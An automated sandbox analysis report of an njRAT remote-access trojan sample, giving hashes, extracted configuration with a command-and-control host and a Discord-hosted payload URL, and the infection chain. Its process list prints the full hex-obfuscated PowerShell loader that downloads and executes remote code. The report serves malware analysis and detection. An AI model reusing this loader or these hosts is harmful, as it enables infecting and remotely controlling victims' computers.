Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en -
submitted
13-09-2021 17:28
Static task
static1
Behavioral task
behavioral1
Sample
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
Resource
win7-en
General
-
Target
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
-
Size
7KB
-
MD5
0152ba660d23a2bb6edda5078fc936fa
-
SHA1
253c14c6dd3e5aaa224b2cb6bfc9a53012896776
-
SHA256
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522
-
SHA512
8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666
Malware Config
Extracted
https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg
Extracted
njrat
v2.0
HacKed
d3dx-botnet.portmap.host:7276
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 4744 powershell.exe -
Drops startup file 1 IoCs
Processes:
AppLaunch.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk AppLaunch.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4744 set thread context of 4972 4744 powershell.exe AppLaunch.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4744 powershell.exe 4744 powershell.exe 4744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
powershell.exeAppLaunch.exedescription pid process Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe Token: 33 4972 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4972 AppLaunch.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4560 wrote to memory of 4636 4560 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe WScript.exe PID 4560 wrote to memory of 4636 4560 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe WScript.exe PID 4636 wrote to memory of 4696 4636 WScript.exe cmd.exe PID 4636 wrote to memory of 4696 4636 WScript.exe cmd.exe PID 4696 wrote to memory of 4744 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 4744 4696 cmd.exe powershell.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe PID 4744 wrote to memory of 4972 4744 powershell.exe AppLaunch.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe#cmd5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.batMD5
53c8f257e3d32009e9e087dd8ed38da9
SHA1ed4f3487930634c56fc02e6d4272eb93a84d7836
SHA2563bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f
SHA51296c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbsMD5
232174031b9591e1add2320bf6da9f14
SHA13f2722464c176abc974441f21fbdeba071d67f5d
SHA2565694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7
SHA512d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\key.binMD5
138a4669ce7b2e27012c9f4ffc3993fe
SHA120f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0
SHA25683a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206
SHA512cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d
-
memory/4560-115-0x0000000000150000-0x0000000000151000-memory.dmpFilesize
4KB
-
memory/4636-117-0x0000000000000000-mapping.dmp
-
memory/4696-120-0x0000000000000000-mapping.dmp
-
memory/4744-137-0x0000025FB0F46000-0x0000025FB0F48000-memory.dmpFilesize
8KB
-
memory/4744-154-0x0000025FB0EC0000-0x0000025FB0ED5000-memory.dmpFilesize
84KB
-
memory/4744-135-0x0000025FB0F40000-0x0000025FB0F42000-memory.dmpFilesize
8KB
-
memory/4744-136-0x0000025FB0F43000-0x0000025FB0F45000-memory.dmpFilesize
8KB
-
memory/4744-126-0x0000025F98DE0000-0x0000025F98DE1000-memory.dmpFilesize
4KB
-
memory/4744-152-0x0000025FB0EB0000-0x0000025FB0EB2000-memory.dmpFilesize
8KB
-
memory/4744-121-0x0000000000000000-mapping.dmp
-
memory/4744-130-0x0000025FB1050000-0x0000025FB1051000-memory.dmpFilesize
4KB
-
memory/4744-158-0x0000025FB0F48000-0x0000025FB0F49000-memory.dmpFilesize
4KB
-
memory/4972-156-0x000000000040838E-mapping.dmp
-
memory/4972-155-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/4972-164-0x0000000008FD0000-0x0000000008FD1000-memory.dmpFilesize
4KB
-
memory/4972-165-0x0000000009B00000-0x0000000009B01000-memory.dmpFilesize
4KB
-
memory/4972-166-0x00000000095F0000-0x00000000095F1000-memory.dmpFilesize
4KB
-
memory/4972-167-0x0000000009600000-0x0000000009601000-memory.dmpFilesize
4KB
-
memory/4972-168-0x00000000095C0000-0x00000000095C1000-memory.dmpFilesize
4KB